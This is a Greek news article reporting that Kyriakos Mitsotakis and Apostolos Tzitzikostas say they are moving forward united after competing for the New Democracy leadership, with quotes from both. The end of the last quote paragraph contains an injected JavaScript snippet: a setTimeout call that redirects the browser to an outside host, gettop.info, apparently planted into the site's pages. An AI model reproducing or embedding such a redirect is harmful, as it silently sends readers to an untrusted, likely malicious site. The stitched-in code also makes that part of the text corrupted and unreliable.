Ενωμένοι προχωρούν Μητσοτάκης – Τζιτζικώστας στην επόμενη ημέρα

0
4

 

Ενωμένοι στην επόμενη ημέρα προχωρούν Κυριάκος Μητσοτάκης και Απόστολος Τζιτζικώστας, όπως δήλωσαν μετά τη συνάντηση που είχαν στο γραφείο του περιφερειάρχη Κεντρικής Μακεδονίας, τονίζοντας ότι αφήνουν πίσω όσα τυχόν προβλήματα υπήρξαν επειδή ήταν υποψήφιοι για τη θέση του προέδρου της Ν.Δ.

«Εμείς είχαμε πει από την πρώτη στιγμή, όταν και οι δύο κατεβήκαμε υποψήφιοι ότι την επόμενη μέρα αυτής της εκλογικής μάχης δεν μας χωρίζει τίποτε. Η Ν.Δ., πορεύεται ενωμένη και χρέος της δικής γενιάς – γιατί είμαστε και οι δύο νέοι άνθρωποι – είναι αυτά τα πράγματα να τα αφήσουμε πίσω μας και να μπορούμε να συνεργαζόμαστε για το κοινό καλό. Έτσι προσεγγίζουμε το ζήτημα αυτό. Έχω πολύ μεγάλη εκτίμηση για τον Απόστολο, για τη δουλειά την οποία κάνει και όπως αντιλαμβάνεστε δεν υπάρχει κανένα απολύτως ζήτημα», είπε ο πρόεδρος της Νέας Δημοκρατίας Κυριάκος Μητσοτάκης, απαντώντας σε ερώτηση δημοσιογράφου.

«Είναι γεγονός ότι αυτά ανήκουν στο παρελθόν. Εμείς κοιτάζουμε μπροστά. Είμαστε νέοι άνθρωποι και για το καλό της παράταξης, αλλά και της χώρας, είμαστε όλοι μαζί απέναντι στον κοινό στόχο που έχουμε να φέρουμε στη χώρα μια καλύτερη κυβέρνηση», τόνισε από την πλευρά του ο Απόστολος Τζιτζικώστας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here